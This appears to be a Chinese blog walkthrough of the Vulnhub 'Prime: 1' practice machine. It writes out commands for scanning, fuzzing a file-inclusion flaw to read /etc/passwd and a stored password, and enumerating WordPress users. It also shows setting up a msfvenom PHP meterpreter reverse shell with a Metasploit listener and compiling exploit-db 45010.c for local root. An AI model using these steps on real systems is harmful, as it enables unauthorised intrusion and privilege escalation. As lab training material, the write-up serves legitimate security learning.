一次prime1靶机的渗透测试

最新推荐文章于 2024-06-20 18:31:22 发布
最新推荐文章于 2024-06-20 18:31:22 发布
阅读量865 收藏 17
点赞数 23
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80116443/article/details/139814129
版权

1.主机发现和端口扫描

2.目录扫描

3.FUZZ和LFI

4.WordPress漏洞扫描

5.提权

1.主机发现和端口扫描

先确定本机的C段,可以查看虚拟机IP,

然后nmap直接扫:

nmap -sP 192.168.xx.x/24

发现靶机IP

我们扫靶机开放的端口:

nmap -p 1-65535 -A 192.168.11.142

我们发现他开了一个22端口和80的端口,并且后面的操作系统和中间件也已经暴露

我们根据这个80端口,我们直接在百度访问一下

发现了一个HTTP页面

2.目录扫描

我们已经发现一个http服务,我们没什么发现,我们扫一下目录:

dirb http://192.168.11.142

我们一共发现了15个,但是我都打开了一遍没什么东西,因为之前的HTTP页面提示我们要找参数,那么我们过滤一下扫描:

dirb http://192.168.11.142 -X .txt,.php,.zip

发现一个可疑的文本,我们直接打开看一下:

提示我们用FUZZ扫描,并且要获取一个参数,让我们看一个  location.txt

3.FUZZ和LFI

FUZZ的作用:FUZZ模糊测试:

1.找参数

2.目录扫描

3.密码暴力破解

4.找出被过滤的参数 SQL XSS

5.压力测试

我们进行FUZZ扫描:
wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.11.142/index.php?FUZZ

发现很多相同的12W,我们将12W进行过滤:

wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt --hw 12 http://192.168.11.142/index.php?FUZZ

我们发现参数是一个file,我们将file填上去:

我们需要进一步寻找参数值,这明显是一个文件包含漏洞,因为我们之前获得了一个location.txt,我们填上去看一下

它让我们使用secrettier360 这个参数,我们将file替换,查看

什么也没有,说明我们找的参数不对,这里我们可以继续用FUZZ进行爆破参数,但是Linux里面,密码大多数存储在 /etc/passwd里面,我们试一下

这里面爆出了一些东西,注意这里的index.php 被 我换成了 image.php 这是之前目录扫描扫到的

这里很乱我们用Linux去访问这个地址:

我们在最后发现密码在 /home/saket 这个目录里面,我们访问一下:

我们发现了这个密码 follow_the_ippsec,但不知道这个密码是哪个服务的密码,我们盲猜一下,是不是MySQL的密码,我们试一下:

ssh -p 22 mysql@192.168.11.142

密码不对,那么我们先放着

因为我们之前之前扫到了一个web 的 wordpress 的一个CMS系统,我们打开看一下

正好经过一番查找,发现了一个登录页面:

我猜测密码应该是用在这里,但是我们没有用户名,我们需要先获取

4.WordPress漏洞扫描

我们使用cmseek 这个扫描工具,

cmseek -u http://192.168.11.142/wordpress/

我们并没有发现用户名

我们换一个工具试一下:

wpscan --url http://192.168.11.142/wordpress/ --enumerate u

我们发现一个用户名 victor

我们进行登录:

成功登录,我们来到后台,接下来我们需要提权获取最高权限

5.提权

这里我们可以利用WordPress的漏洞,我们可以用漏扫工具扫一下,

这里面可以从上传点和编辑点下手,这里我是找的编辑点,

查找了一遍以后,我发现这个地方可以编辑上传

这里就可以上传一句话木马,但是我要拿到root权限,那么我要建立一个反弹连接

打开msf工具,可以用msfvenom来生成payload,生成PHP的反弹shell

我们生成PHP的payload:

msfvenom -p php/meterpreter/reverse_tcp

生成成功,我们将payload粘贴到网站后台:

我们用msf建立监听:使用监听的模块:use exploit/multi/handler

建立payload:set payload php/meterpreter/reverse_tcp

建立IP:set lhost 192.168.xx.xxx

建立端口:set lport 7777 

利用:exploit

监听建立以后,我们访问我们传上去payload,

http://192.168.xx.xxx/wordpress/wp-content/themes/twentynineteen/secret.php

反弹成功,我们输入一下命令试一下:

爆出信息,接下来我们进行提权获取root权限,因为爆出了操作系统,我们查看操作系统的漏洞,进入msfconsole

searchsploit 16.04 Ubuntu

查找对应的漏洞版本,后面有一个脚本,我们需要把它编译为我们需要利用的,然后传到目标靶机里面,然后执行,就可以提升到root权限

我们找到了对应的漏洞,

将这个漏洞脚本复制到本地目录中:

cp /usr/share/exploitdb/exploits/linux/local/45010.c ./

然后编译为可执行程序:

gcc 45010.c -o 45010

然后传到靶机上去:

upload /root/45010 /tmp/45010 注意:只有tmp有权限

我们查看是否传入成功,我们进入shell界面,进入tmp目录

传入成功

我们给他一个可执行权限:

chmod +x 45010

然后我们运行这个可执行文件,直接获取root权限

查看本机用户:whoami

CTF的
关注
  • 23
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub | 实战靶场渗透测试 - PRIME: 1
尼泊罗河伯的博客
06-01 1590
这台机器是为那些试图准备 OSCP 或 OSCP 考试的人设计的。这是素数系列的第一级。在每个阶段都会提供一些帮助。机器很长,因为 OSCP 和黑客的机器是设计的。因此,您有一个获取根标志和用户标志的目标。如果卡在某个点上,则会在枚举级别上提供一些帮助。
【学渗透靶机——prime】
jieli0901227的博客
05-13 235
提示使用secrettier360作为参数在每一个php 页面,有参数没有值,那我们就在index.php 和image.php 上测试文件包含漏洞。这台靶机开放端口 22 80 端口 使用nmap 扫描只有枚举的信息, 22 端口也没有账密信息 ,所以重点放在80端口上。接下来直接拿webshell,打开我们最喜欢的主题编辑器,翻了半天,只有secret.php 存在写权限,写入反弹shell。页面提示我挖错文件了,,那就尝试读取location.txt.,如下图。查看enc 文件 无读权限。
渗透测试怎么搭建靶机_渗透测试实战——prime靶机入侵
weixin_39745724的博客
11-21 138
原创:safe6合天智汇原创投稿活动:重金悬赏 | 合天原创投稿等你来Ip:192.168.0.115Kali:192.168.0.21安装好的靶机界面Nmap扫描端口【注:Nmap是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端。Nmap扫描相关的信息可以到合天网安实验室操作实验——Nmap网络扫描,实验:Nmap网络扫描(合天网安实验室)】nmap-sV -A 192.168.0.1...
[渗透测试学习靶机07] vulnhub靶场 Prime 2
weixin_47112073的博客
10-27 1564
Prime 2这个靶机我看网上很少有人通关打靶练习,自己尝试做了一下,感觉整体难度:比较难,大家可以参考一下。
Vulnhub-靶机-PRIME: 1
weixin_45042115的博客
10-03 1525
今天发现了一个有趣的靶机,加载到本地VMware Workstation工作站进行漏洞复现 靶机下载地址 https://www.vulnhub.com/entry/prime-1,358/ 对目标进行扫描发现开放端口信息 nmap -sS -sV -p- -T5 100.100.100.130 浏览器访问,并对其进行目录扫描 dirb 描目录发现了/wordpress目录和一些其他的页面 对wordpress进行扫描 wpscan--url http://rip/wordpress/ --
Vulnhub之prime-1靶场[渗透测试]
qq_60115503的博客
08-29 1071
将下载好的靶场导入VMware,虚拟机设置网络模式为nat模式,即可开启渗透。
靶机渗透之Prime1
qi_qi14的博客
07-13 219
找到目标靶机ip地址为192.168.133.140 发现有两个开放端口 分别为22端口和80端口 端口UDP扫描 漏洞脚本扫描 访问靶机80端口 访问得到 sudo curl http://192.168.133.140/secret.txt Looks like you have got some secrets.Ok I just want to do some help to you.Do some more fuzz on every page of php which was finde
php mysqll注入靶机,渗透测试实战——prime靶机入侵
weixin_33329305的博客
03-25 197
原标题:渗透测试实战——prime靶机入侵Ip:192.168.0.115Kali:192.168.0.21安装好的靶机界面 Nmap扫描端口【注:Nmap是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端。Nmap扫描相关的信息可以到合天网安实验室操作实验——Nmap网络扫描nmap-sV -A 192.168.0.115 发现只开了80和22端口,直接从80入口 扫描一下目录文件dir...
vulnhub渗透测试靶机prime-1
weixin_46128614的博客
01-19 1167
靶机下载地址https://www.vulnhub.com/entry/prime-1,358/ nmap -sS -sV -p- -T5 发现只开了22和80那就从80入手吧 浏览器访问 主页除了一张图片啥都没有 dirb扫描目录发现了/wordpress目录和一些其他的页面 其中的image.php,secret.txt都不是默认字典有的,问了几个师傅,说做多了就有经验了,关键字典要自己...
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
AWS 批量添加安全
大鹅的博客
06-17 255
bin/bash# 定义安全组ID-宁夏 VPC:NX-NHRY-PRD-VPC vpc-xxx# 从文件中读取IP地址到数组# 循环遍历内网 IP 列表。
《软件定义安全》之八:软件定义安全案例
大龄IT民工
06-13 1256
Embrane是一家虚拟设备提供商,由Cisco公司前员工创立,该公司致力于实现网络功能实体的软件化,旨在研发出多服务、分布式软件架构的网络服务产品。它于2015年4月被Cisco公司收购。Embrane的软件定义架构称为Heleos,利用虚拟通信设备代替原有基于专有硬件平台的设备,通过一个集中的控制台对虚拟设备进行管理和控制。Heleos与原来的应用交付网络(ADN)产品较为接近,是基于软件的L4~L7虚拟设备,包括负载均衡产品、防火墙、VPN产品和SSLOffload Engine。
网络安全Web 安全 面试题.(XSS)
网络安全领域___专研者.
06-20 492
网络安全面试是指在招聘过程中,面试官会针对应聘者的网络安全相关知识和技能进行评估和考察。这种面试通常包括以下几个方面: (1)基础知识:包括网络基础知识、操作系统知识、密码学知识等。 (2)安全技术:如入侵检测、防火墙配置、密码管理、漏洞分析等技术的掌握程度。 (3)安全实践:评估应聘者在实际工作中解决网络安全问题的能力,如案例分析、渗透测试等。 (4)安全意识:了解应聘者对网络安全的重视程度和责任心,以及在安全事故发生时的应对能力。 (5)项目经验:询问应聘者参与过的网络安全相关项目,了解其在项目中的具体
企业防盗版,如何保障上网安全
最新发布
shenxinda_lu的博客
06-20 121
当需要访问互联网时,用户在隔离沙盒内进行操作,确保主机与互联网物理隔离,只有沙盒能够访问互联网,且沙盒与本机隔离。
metasploit靶机渗透测试
08-02
Metasploit靶机是一个用于渗透测试和漏洞利用的虚拟机。您可以通过在VMware虚拟机中安装Metasploitable来搭建一个用于练习渗透攻击的环境。首先,您需要下载Metasploitable虚拟机镜像文件,可以在SourceForge网站上找到下载链接[1]。然后,您需要在VMware Workstation中创建一个新的虚拟机,并将下载的Metasploitable镜像文件导入到虚拟机中。接下来,您可以启动Metasploitable虚拟机,并使用Kali Linux等工具进行渗透测试和漏洞利用的练习[2]。 请注意,渗透测试和漏洞利用是一项合法的活动,但在进行任何形式的渗透测试之前,您必须获得合法的授权,并且只能在授权范围内进行操作。此外,渗透测试应该仅限于您拥有合法权限的系统和网络。在进行任何渗透测试之前,请确保您已经了解并遵守相关的法律和道德准则[3]。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值